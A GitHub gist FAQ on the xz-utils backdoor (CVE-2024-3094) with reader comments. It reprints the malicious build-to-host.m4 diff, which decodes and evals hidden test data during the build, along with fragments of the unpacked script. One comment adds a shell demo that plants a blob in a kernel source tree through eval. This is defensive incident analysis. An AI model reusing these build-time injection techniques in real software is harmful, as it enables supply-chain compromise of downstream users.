Skip to content

Instantly share code, notes, and snippets.

@thesamesam
Last active October 11, 2024 03:27
Show Gist options
  • Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may be yet discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild where it gets activated by connections - resulting in performance issues, but we do not know yet what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL:DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc, that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thusly seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl

Payload

If those conditions check, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd, this is more unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns some other projects are affected (either by themselves or changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt but listing some examples here which are already been linked widely to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projecs which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@DaLynxx
Copy link

DaLynxx commented Apr 10, 2024

xz @ github is available again. https://github.com/tukaani-project

@christoofar
Copy link

christoofar commented Apr 10, 2024

Right now @ivq I don't believe your word salad without showing some RISCV proofs against a direct invocation of 5.6.0 or 5.6.1

Pull out your RISCV board and do a time test and post it here, then.

Anyway... both the encoder initter and decoder initter got this harmless looking adjustment that, in the decoder, is not used at all and is only meant by Lasse to report out completed results of decompression. But with the right compile options it survives being removed. Since the filter options themselves are a travel point every point in code, guess where the pointers to the backdoor go?

The harmless looking filter flags update are critical to activating the backdoor, there's so many data structures to hijack inside lzma; some so handy that simpler types without promoting them into pointers is not needed. You essentially have your own database.

Which is what lzma_vli probably will be promoted to someday in a server hotpatch, who the hell knows.

image

@DaLynxx
Copy link

DaLynxx commented Apr 10, 2024

Also https://xz.tukaani.org/xz-utils/ no longer responds. (affects link under chapter 'Background')

@christoofar
Copy link

christoofar commented Apr 10, 2024

Most HLL programmers are just gonna go "huh?" because they cannot understand the concept in their minds that when you leave an area of memory loaded with your porn stash without wiping it and just zero the pointer out, your porn history table still sits there in RAM.

Now Jia can read it.

There's still no idea how much is left to find. I'm reliving my Compaq Deskpro 8086 days which was the last time I wrote asm, I don't know a thing about x64 asm beyond just the register sizes and effects (and some of the original x86 opcodes), there is so much more to discover.

liblzma.so is both a nightmare, and a masterpiece of layered integration. And the thing is fucking evil.

Fucking. Evil.

P.P.S.: All the credit to everyone helping out on the re. I'm not a security huckster and shilling corps with CBT videos. I have done integrations of weird shit to normal shit my whole career, and pulling out and sussing through crashdumps, register readouts, logs and any other evidence I can get my hands on when I get stuck and have to produce the normie-version of events and developers are trying to throw shit over the wall back on to developers who have no control on their side of the fence have solid ammo to fire back with. "They broke our shit" is what gets me going.

When I'm coming for you with a diff report, run.

@christoofar
Copy link

christoofar commented Apr 10, 2024

Oh, cool bin trick from fiddling with game roms:

compact a bin (gz will do in many cases, not all but most). You can spot where data goes and where code goes when the compaction removes away all the 00 FF patterns left around for initializers. It only works for empties, but in corpland and especially in C++ there's monster data structures that compact to almost nothing.

In Jia Tan's case, the function delete reorders everything that survived, resulting in a byte slide that picks up well on the radar.

You already have a bindiff analyzer on your box. It's in emacs (the other malware you can get from the distros). It's a neat trick when a vendor sends something and I need a clue of how "big" their changes were, generally-speaking, they keep 9 layers of mis-management away from me and the other team actually doing the work, and to sense when they aren't talking but the bins they're walking indicate they're doing a refactor job on the inside.

Jia again:
image

@terokinnunen
Copy link

@Chestnuts4 Hi. Are you looking for the safe/original/non-tampered version of build-to-host.m4? You can get this from gnulib. It might be in /usr/share/aclocal on your system if you have recent gettext installed too.

Thanks, I was puzzled about this too for quite a while. Just an idea - pointer to legit upstream https://git.savannah.gnu.org/gitweb/?p=gnulib.git;a=blob;f=m4/build-to-host.m4;h=f466bdbd84abdf60e8305fa7adc12c74d7f05a8a;hb=HEAD would be helpful clarification here.
(Probably the TODO item "Explain dist tarballs" will cover this later (?), but until then, a quick pointer in Design section would clarify a lot.)

@christoofar
Copy link

christoofar commented Apr 10, 2024

🤔

Any particular reason Jia Tan why you nuked this whole area and in its place is the execution path that takes you to the backdoor?

image

image

@rybak
Copy link

rybak commented Apr 10, 2024

FYI, the malicious commits (the in-repository portion of the backdoor) were reverted: e93e13c (Remove the backdoor found in 5.6.0 and 5.6.1 (CVE-2024-3094)., 2024-04-08).

@thesamesam
Copy link
Author

I'll try respond to the above comments which need me to make changes later today. Thanks.

@roccotanica1234
Copy link

Jia Tan's account, associated to jiat0218@gmail.com on Twitter is: https://twitter.com/JiaT03868010 (I haven't find it mentioned anywhere)

@flybyray
Copy link

What is "this"? xz_wrap was recently changed by Lesse, but the changes are reasonable and do not introduce any new eval; the options are consistent with manpage recommendations. The Makefiles were recently changed for version and other reasons, not much to do with xz.

cmd_xzkern = cat $(real-prereqs) | sh $(srctree)/scripts/xz_wrap.sh > $@

ref: https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/Makefile.lib?h=next-20240328#n528

which is quite different from all other compression tools.
Because it does not pipe directly into the xz tool. it uses an additional process sh in the hiarchy. sh provides additional insight via environment variables for child processes.
The whole thing has nothing to do with stripped down xz decompression code within the kernel.
The call goes into what is packaged in the kernel build environment for $XZ.

eval "$($XZ --robot --version)" || exit

ref: https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/xz_wrap.sh?h=next-20240328#n36

When you follow @christoofar lookups you may notice that $XZ might work differently when it detects specific things.
$XZ for sure is linked to liblzma.so.

@Artoria2e5
Copy link

And my dear Ray, there’s already a NON-MALICIOUS EXPLANATION as to why an sh is used: it turns on the bcj flags.

@flybyray
Copy link

And my dear Ray, there’s already a NON-MALICIOUS EXPLANATION as to why an sh is used: it turns on the bcj flags.

Better safe than sorry. Ask yourself what a NON-*-EXPLANATION is worth. Especially an explanation which is at all wrong - shows just that supplier has no experience.

@Artoria2e5
Copy link

Artoria2e5 commented Apr 12, 2024

sh provides additional insight via environment variables for child processes.

It also does not, because the shell script in question does not export anything new to the environment. The shell only changes envp in three circumstances:

  • when a new variable is explicitly added to envp via "export" or "declare -x"
  • when a variable is explicitly de-exported, say by running declare +x
  • when an already-exported variable, such as PATH, is changed or unset

Otherwise every variable change stays local to the shell process.

The only additional "insight" is just the well-documented BCJ and lzma alignment parameters.

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

@paulfloyd
Copy link

paulfloyd commented Apr 12, 2024

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

@flybyray
Copy link

flybyray commented Apr 12, 2024

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

Polite as you are, you used " maybe". Politeness won't help you against a criminal hacker's ideas. The experiences of doubters are often worth more than those of so-called fact-checkers.

because the shell script in question does not export anything new to the environment

if you waited patiently after reading carefully until you really understood what you had read, without ignoring the meaning of the words, you could avoid misinterpretations and make fewer inference errors.
I wrote "insight via environment variables for CHILD processes". How dare are you that you then talk about "does not export anything new to the environment"? I wish you would rather fantasize about the similarity between eval and evil.

have you really understood only some of the attack patterns that have already been discussed here? because of course the attackers in a build process don't care about changing the environment! just think about how many places environment variables could appear in logs and the hide-and-seek game would end immediately. I would recommend to you, that you inspect some public build servers and their artifacts and detailed outputs of builds.

The trick is to leave artifacts in the right places as inconspicuously as possible during the build process.

But I'm not giving up on you yet. Let's start by making the bold printed a little clearer.
The following should only use the fragments highlighted in the leading comment as a sample. I didn't develop xz, so I'm replacing it with sh. I can't use the --robot --version arguments, but they are almost irrelevant.

# this is only pretext normally provided by the task to build the kernel
TEMPDIR="$(mktemp -du)"
mkdir -p $TEMPDIR/Artoria2e5/mykernel/scripts
mkdir -p $TEMPDIR/Artoria2e5/mykernel/prereqs
srctree=$TEMPDIR/Artoria2e5/mykernel
pre_reqs="$TEMPDIR/Artoria2e5/mykernel/prereqs/a.txt"
XZ=sh
export XZ
echo please cleanup $TEMPDIR when you are done
cat >"$TEMPDIR/Artoria2e5/mykernel/prereqs/a.txt"<<'EOF'
lorem ipsum and some intersting pointers to CANCER
EOF
cat >"$TEMPDIR/Artoria2e5/mykernel/scripts/xz_wrap.sh"<<'EOF'
eval "$($XZ -c 'TARGET_DIR='$(dirname ${BASH_SOURCE[0]})/..';echo STEVE_S_LATE_REVENGE_FOR_LINUX="$(grep -Po '\''pointers to \K\S+'\'')";echo $'\''X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\''> ${TARGET_DIR}/blob.txt')" || exit
#this is just to make it easier to understand the above XZ command would be able to produce this too
echo a $STEVE_S_LATE_REVENGE_FOR_LINUX that attaches itself in an intellectual property sense to everything it touches
EOF

# now we are going to "build the kernel" - show casing just relevant maybe malicious part
# original 'cmd_xzkern = cat $(real-prereqs) | sh $(srctree)/scripts/xz_wrap.sh > $@' 
cat ${pre_reqs} | sh ${srctree}/scripts/xz_wrap.sh > a_message_to_the_linux_people.txt
# finished nothing special to see

# verify that the build context was modified
cat a_message_to_the_linux_people.txt
find $TEMPDIR -type f -name blob.txt -exec cat {} \;

# cleanup
rm -rvf $TEMPDIR

unfortunately, based on your reading comprehension, i have to assume that you still won't understand. but maybe there are a few others who can help you further.
The verify step would show you

  • 'cat a_message_to_the_linux_people.txt'
a CANCER that attaches itself in an intellectual property sense to everything it touches
  • 'find $TEMPDIR -type f -name blob.txt -exec cat {} ;' # a nice blob placed into srctree
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

i have done my duty and shown good will

@dnorthup-ums
Copy link

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

@paulfloyd The 0x6 address is pretty easy, that's evidence of something being compiled with the -fPIE compile time flag set, something the build scripts of xz-utils do not do (including the compromised ones). As for the 64-bit 0x77... or 0xDD2A.... addresses, it looks to me like something is trying to be clever and take advantage of the "hole" between typical user space and kernel space when injecting the payload via ifunc. I suspect if you look at one of the disassembly attempts of the exploit you'll get more insight into what is going on there and why those are important (as noted, I strongly suspect they are).

@AdrianBunk
Copy link

Maybe a doubt that is "at all wrong" also shows the doubter has no experience?

Polite as you are, you used " maybe". Politeness won't help you against a criminal hacker's ideas. The experiences of doubters are often worth more than those of so-called fact-checkers.

if you waited patiently after reading carefully until you really understood what you had read, without ignoring the meaning of the words, you could avoid misinterpretations and make fewer inference errors.

@flybyray Conspiracy theories and insults from people like you are not helpful.

A huge amount of people all over the world who are highly competent in this area have been working on dissecting this exploit for 2 weeks, anyone who claims to have found something new on the technical side here in this discussion only demonstrates being clueless.

Please stop it.

@AdrianBunk
Copy link

AdrianBunk commented Apr 12, 2024

The 0x6 address is pretty easy, that's evidence of something being compiled with the -fPIE compile time flag set, something the build scripts of xz-utils do not do (including the compromised ones).

All major distributions (including Debian) changed their compiler to default to PIE several years ago for ASLR.

@christoofar
Copy link

christoofar commented Apr 13, 2024

Has anyone done any detailed examination of the exact cause of the Valgrind errors that Freund (and Fedora and maybe other distros) saw?

https://bugzilla.redhat.com/show_bug.cgi?id=2267598

I'm mainly curious about the strange stack addresses like 0x6 and 0x77AD31E59B84CFFF. The persons responsible did try to cover up by adding an option to turn off omit-frame-pointer. Does the exploit assume the use of the frame pointer, and if it isn't there gets the stack layout wrong and writes below the stack pointer? (Below literally means below as in address less than RSP, not from the inverted view of the grow-down stack. But not as far below as the stack guard). omit-frame-pointer may also be affecting Valgrind's stack walking.

When we talked it out, the function that was doing this nuke (microlzma is what Jia Tan wants to raise during init), did not supply a size when it entered the loop to start writing 0x00 into a stack area.

This function, lzma_stream_header_encodb, is not in the 5.6.1 .o release, it only appears in the 5.6.0; hence the theory that a mistake in the feature flags for the build did not completely strip out the setup for a debug/examine tool (which would have reported out the progress of the locator and possibly also brought in a more comprehensive debug/examine tool as an option). My guess is that it's not a mistake in the offsets calculations (there is a whole DASM library inside the malware), but a way to quickly patch the obfuscations in while still making sure that the hotloading core code stays functional.

Jan Tan needed someway to know that he landed on all the jump calls needed to patch libcrypto.

Further: The final 5.6.1 has an insert in the ELF table for a note area that is moving all the bytes down 0x26, and throwing the asm dumps into diff shows a heavy amount of offset changes in microlzma, the gateway to the backdoor.

@christoofar
Copy link

christoofar commented Apr 13, 2024

I've been thinking a lot about this as a CGo/gccgo dev: "What can a HLL programmer do against the likes of Jia Tan? They're attacking from the foundation software."

I'm not settled on this one but wrapping calls to C libs in goroutines probably would raise the difficultly level, as the rapid context switches and unpredictability introduced on where the Go runtime will move the jump calls happens.

After 129,000 lines of asm, here is printf("Hello World") in Go down at the bottom:
image

Now, let's see what happens when we do this:

func main() {
	hello := "Hello world!"
	go func() {
		print(hello)
	}()
	time.Sleep(1*time.Second)
}

Now we're asking the Go runtime to activate concurrency and main itself gets split into two compact parts with an anonymous function that disappears into the goroutine ecosphere (to get this to fit I'm stripping symbols):
image
image

Notice how nice and compact the goroutine is! Not many things you can do here but try to intercept the ret and call instructions, but you will need to also make sure the runtime stack cleanup happens or things will start to go crashycrashy.

So now let's make a C lib call but push it down into a goroutine wrapper, yet make it synchronous. And for fun, the data to the function will be passed via a channel, which brings in the communication/sync areas of the runtime with its maze of runtime functions. And since we're here, let's make it a full Go wrapper, with two channels and a goroutine bridge, and a done signaler.

package main

// #include <stdio.h>
// #include <stdlib.h>
// void printFromC(const char* str) {
//     printf("Received C string: %s\n", str);
// }
import "C"
import "unsafe"

func main() {
	myPrint("Hello from Go!")
}

func myPrint(hellostring string) {
	// Protect the C library call from Jia Tan and the NSA
	sendchan := make(chan string)
	recvchan := make(chan string)
	done := make(chan bool)
	
	go func(sender chan string, receiver chan string){ // This chan is send-only
		go func(receive <-chan string) { // This one is recv-only
			callCPrint(receive)
			done <- true
		}(receiver)
		go func() {
			strToSend := <- sender
			receiver <- strToSend
			close(sender)
			return
		}()
	}(sendchan, recvchan)

	sendchan <- hellostring
	<-done
	return
}

func callCPrint(str <-chan string) {
	cStr := C.CString(<-str)
	defer C.free(unsafe.Pointer(cStr)) // Deallocate memory when done
	C.printFromC(cStr)
}

The main() in asm representation gets shorter
image

But now there is some real fun going on in myPrint() as it's acting as a traffic cop moving the string along its way into the chaos of pthread, with its context switches and semaphores. myPrint is split by the compiler into 6 asm functions (one each for the launch point and anonymous function of the three goroutines) to allow for their dynamic reallocation to the runtime.

image
That goes on for pages.

callCPrint then has a thunk going on, which can't get back its data to myPrint without going back through the runtime maze.
image

I'm still not sold on this approach but I'm definitely willing to change my own behavior to make these creeps go away if the difficulty is raised high enough. And throwing CGo calls through a goroutine bridge still makes readable code to me.

@tdkuehnel
Copy link

Beside the technical things involved around this incident, which required profound knowledge and ability to develop and implement such an attack, the weak point and what was easy to establish was the social factor of the attack. It took only two persons working together to nudge the project maintainer out of the way. THAT is the real catastrophy.

We need to use the internet to represent our real social connections, not to throw the whole world into one community driven by some huge content aggregators. The real power of the internet is still hidden in its decentralized inherent structure, which we are using and taking benefit of only in small amounts today.

Yes, client-server brought the whole internet thing up to live, but now we are adult enough to decide for our own with whom to share and connect directly and how to decide who has access to which part of my own data. My comments are my data, every content i create is my data, it has to be distributed by the network of the poeple i know and trust, by their devices. Not by content aggregators. When i watch a yt video or other content, i want to see the comments of my friends and social contacts first, access the comments from their data stores directly. Better let me decide and configure which comments to see at all, not let it be dictated by some content aggregators which are deadstuck in their own development. The whole internet has to be shaped around our social contacts and networks, not be dictated by some content aggrgators. /rant off.

@cwegener
Copy link

cwegener commented Apr 14, 2024 via email

@avbentem
Copy link

@cwegener I'm guessing @tdkuehnel may be referring to what happened in 2022 according to a list of events curated by @boehs.

@flybyray
Copy link

flybyray commented Apr 14, 2024

@flybyray Conspiracy theories and insults from people like you are not helpful.

Perhaps you are in a position to take your sort of interference as an insult.

A huge amount of people all over the world who are highly competent in this area have been working on dissecting this exploit for 2 weeks, anyone who claims to have found something new on the technical side here in this discussion only demonstrates being clueless.

Are you implying that I am trying to claim something without a proof? And you try it to do only with a mere personal assertion? Pipes!

Please stop it.

I hope you do that and come back next time with meaningful additions and statements.
I also hope that you understand what an honest discussion is, that you have to fight back when others try to play unfair by ignoring essential context or trying to distort the meaning of statements.

To get back on track:

  • I joint this discussion just by pointing out that the ultimate target for a supply chain attack will be the kernel. I was just missing something here.
  • that there were surprising changes in the linux-next repo shortly before the backdoor became known. 20/03/2024
  • discussions on the kernel mailing regarding this change to remove it, but it was already pushed into linux-next
    • now there is a newer comment https://lwn.net/ml/linux-kernel/20240404170103.1bc382b3@kaneli/ i am happy that my concern is addressed there. but i would be more happy if they would handle all compression tools equally. there should be a strict interface to comply with. i am not sure why only xz should be allowed to run in different form - it just shows that its internal working is to complex.

Exactly what this recent conclusion section states:
"...
It’s evident that this backdoor is highly complex and employs sophisticated methods to evade detection. These include the multi-stage implantation in the XZ repository, as well as the complex code contained within the binary itself.

There is still much more to explore about the backdoor’s internals, which is why we have decided to present this as Part I of the XZ backdoor series. ..."

"the binary itself" could not be ignored as the master plan ( "golden piece") for a targeted supply chain kernel attack.
especially the mentioned discussions put important things( tangible error ) on the table.
there may be other tools that are part of the build process and are assumed to be safe without question. someone has this concern even tries to scan complete package trees https://github.com/hlein/distro-backdoor-scanner

i fear the structure of a suitable defense will look more complex.

hopefully automation and statistics can help to spot risks.
like you need to track maintainers and their commitment to projects. this is just an example:
"""
Many open-source software (OSS) projects are self-organized and do not maintain official lists with information on developer
roles. So, knowing which developers take core and maintainer roles is, despite being relevant, often tacit knowledge. We propose
a method to automatically identify core developers based on role permissions of privileged events triggered in GitHub issues
